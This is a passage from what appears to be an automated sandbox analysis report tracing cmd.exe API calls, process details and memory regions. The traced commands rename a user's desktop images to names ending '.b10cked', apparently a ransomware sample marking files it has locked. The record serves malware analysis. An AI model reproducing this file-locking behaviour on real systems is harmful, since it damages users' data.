(in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.759] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x23, lpLCData=0x16f9c8, cchData=128 | out: lpLCData="0") returned 2 [0220.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f9c8, cchData=128 | out: lpLCData="0") returned 2 [0220.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f9c8, cchData=128 | out: lpLCData="1") returned 2 [0220.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.760] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.760] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.760] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.761] GetConsoleTitleW (in: lpConsoleTitle=0x2f08c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.761] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.761] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.761] GetProcAddress (hModule=0x76910000, 
lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.761] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.762] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.762] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.762] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.762] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.762] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.762] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.762] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.765] GetConsoleTitleW (in: lpConsoleTitle=0x16f6c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.765] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0220.765] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0220.765] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0220.765] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0220.765] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0220.765] _wcsicmp (_String1="move", _String2="CD") returned 10 [0220.766] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0220.766] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0220.766] _wcsicmp (_String1="move", _String2="REN") returned -5 [0220.766] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0220.766] _wcsicmp (_String1="move", _String2="SET") returned -6 [0220.766] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0220.766] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0220.766] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0220.766] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0220.766] _wcsicmp (_String1="move", _String2="MD") returned 11 [0220.766] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0220.766] _wcsicmp (_String1="move", _String2="RD") returned -5 [0220.766] _wcsicmp (_String1="move", 
_String2="RMDIR") returned -5 [0220.766] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0220.766] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0220.766] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0220.766] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0220.766] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0220.766] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0220.766] _wcsicmp (_String1="move", _String2="VER") returned -9 [0220.766] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0220.766] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0220.766] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0220.766] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0220.766] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0220.766] _wcsicmp (_String1="move", _String2="START") returned -6 [0220.766] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0220.766] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0220.766] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0220.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.768] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f47c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f474, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f474*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) 
returned 3 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.769] 
_wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.769] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0220.769] _wcsicmp (_String1="95ICX9~1.BMP", _String2=".") returned 11 [0220.769] _wcsicmp (_String1="95ICX9~1.BMP", _String2="..") returned 11 [0220.769] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\95icx9~1.bmp")) returned 0x20 [0220.769] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x301d38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.769] SetErrorMode (uMode=0x0) returned 0x0 [0220.770] SetErrorMode (uMode=0x1) returned 0x0 [0220.770] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP", nBufferLength=0x104, lpBuffer=0x16ee04, lpFilePart=0x16edec | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP", lpFilePart=0x16edec*="95ICX9~1.BMP") returned 0x25 [0220.770] SetErrorMode (uMode=0x0) returned 0x1 [0220.770] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.770] _wcsicmp (_String1="95ICX9~1.BMP", _String2=".") returned 11 [0220.770] _wcsicmp (_String1="95ICX9~1.BMP", _String2="..") returned 11 [0220.770] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\95icx9~1.bmp")) returned 0x20 [0220.770] SetErrorMode (uMode=0x0) returned 0x0 [0220.770] SetErrorMode (uMode=0x1) returned 0x0 
[0220.770] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP", nBufferLength=0x104, lpBuffer=0x16f280, lpFilePart=0x16f018 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP", lpFilePart=0x16f018*="95ICX9~1.BMP") returned 0x25 [0220.770] SetErrorMode (uMode=0x0) returned 0x1 [0220.770] SetErrorMode (uMode=0x0) returned 0x0 [0220.770] SetErrorMode (uMode=0x1) returned 0x0 [0220.770] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x16f488, lpFilePart=0x16f018 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked", lpFilePart=0x16f018*="95ICx9P6yb.bmp.b10cked") returned 0x2f [0220.770] SetErrorMode (uMode=0x0) returned 0x1 [0220.770] SetLastError (dwErrCode=0x0) [0220.770] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\95icx9p6yb.bmp.b10cked")) returned 0xffffffff [0220.770] GetLastError () returned 0x2 [0220.771] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x16e994, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e994) returned 0x2f0ee0 [0220.771] FindNextFileW (in: hFindFile=0x2f0ee0, lpFindFileData=0x16e994 | out: lpFindFileData=0x16e994) returned 0 [0220.771] GetLastError () returned 0x12 [0220.771] FindClose (in: hFindFile=0x2f0ee0 | out: hFindFile=0x2f0ee0) returned 1 [0220.772] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x301ad8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x301ad8) returned 0x2f0ee0 [0220.772] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x16ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked", lpFilePart=0x0) returned 0x2f [0220.772] 
GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp", nBufferLength=0x104, lpBuffer=0x16ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp", lpFilePart=0x0) returned 0x27 [0220.772] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\95icx9p6yb.bmp")) returned 0x20 [0220.772] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\95icx9p6yb.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\95icx9p6yb.bmp.b10cked"), dwFlags=0x3) returned 1 [0220.773] FindClose (in: hFindFile=0x2f0ee0 | out: hFindFile=0x2f0ee0) returned 1 [0220.773] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16ebe0 | out: _Buffer=" 1") returned 9 [0220.773] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.773] GetFileType (hFile=0x7) returned 0x2 [0222.930] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0222.930] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16eb6c | out: lpMode=0x16eb6c) returned 1 [0222.930] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.930] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16eba0 | out: lpConsoleScreenBufferInfo=0x16eba0) returned 1 [0222.930] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0222.931] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x16ebe0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0222.931] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16ebc4, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, 
lpNumberOfCharsWritten=0x16ebc4*=0x1a) returned 1 [0222.931] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.931] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0222.931] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.931] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0222.931] _get_osfhandle (_FileHandle=0) returned 0x3 [0222.931] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0222.932] SetConsoleInputExeNameW () returned 0x1 [0222.932] GetConsoleOutputCP () returned 0x1b5 [0222.932] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0222.932] SetThreadUILanguage (LangId=0x0) returned 0x409 [0222.932] exit (_Code=0) Process: id = "574" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16820" os_pid = "0xea4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32904 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32905 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32906 start_va = 
0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32907 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 32908 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32909 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32910 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32911 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32912 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32913 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33046 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33047 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33048 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33049 start_va = 0x280000 end_va = 
0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 33050 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 33051 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33052 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33053 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33054 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33055 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33056 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33057 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33058 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = 
"\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33059 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33070 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 33071 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33072 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33073 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33074 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 33075 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 33076 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 33077 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 33078 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 33079 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Thread: id = 778 os_tid = 0xd48 [0220.171] GetSystemTimeAsFileTime (in: 
lpSystemTimeAsFileTime=0x20f85c | out: lpSystemTimeAsFileTime=0x20f85c*(dwLowDateTime=0xb8076ca0, dwHighDateTime=0x1d440a9)) [0220.171] GetCurrentProcessId () returned 0xea4 [0220.171] GetCurrentThreadId () returned 0xd48 [0220.171] GetTickCount () returned 0x3d74b [0220.171] QueryPerformanceCounter (in: lpPerformanceCount=0x20f854 | out: lpPerformanceCount=0x20f854*=27696069200) returned 1 [0220.172] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.172] __set_app_type (_Type=0x1) [0220.172] __p__fmode () returned 0x76b331f4 [0220.172] __p__commode () returned 0x76b331fc [0220.173] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.173] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.173] GetCurrentThreadId () returned 0xd48 [0220.173] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd48) returned 0x38 [0220.173] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.173] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.173] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.174] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.174] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f7ec | out: phkResult=0x20f7ec*=0x0) returned 0x2 [0220.174] VirtualQuery (in: lpAddress=0x20f823, lpBuffer=0x20f7bc, dwLength=0x1c | out: lpBuffer=0x20f7bc*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.174] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f7bc, dwLength=0x1c | out: lpBuffer=0x20f7bc*(BaseAddress=0x110000, 
AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.174] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f7bc, dwLength=0x1c | out: lpBuffer=0x20f7bc*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.174] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f7bc, dwLength=0x1c | out: lpBuffer=0x20f7bc*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.174] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f7bc, dwLength=0x1c | out: lpBuffer=0x20f7bc*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0220.175] GetConsoleOutputCP () returned 0x1b5 [0220.175] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.175] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.175] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.175] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.176] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.177] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.177] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.177] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.177] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.178] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.178] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.189] GetEnvironmentStringsW () returned 0x410178* [0220.189] FreeEnvironmentStringsW (penv=0x410178) returned 1 [0220.189] GetEnvironmentStringsW () returned 0x410178* [0220.189] 
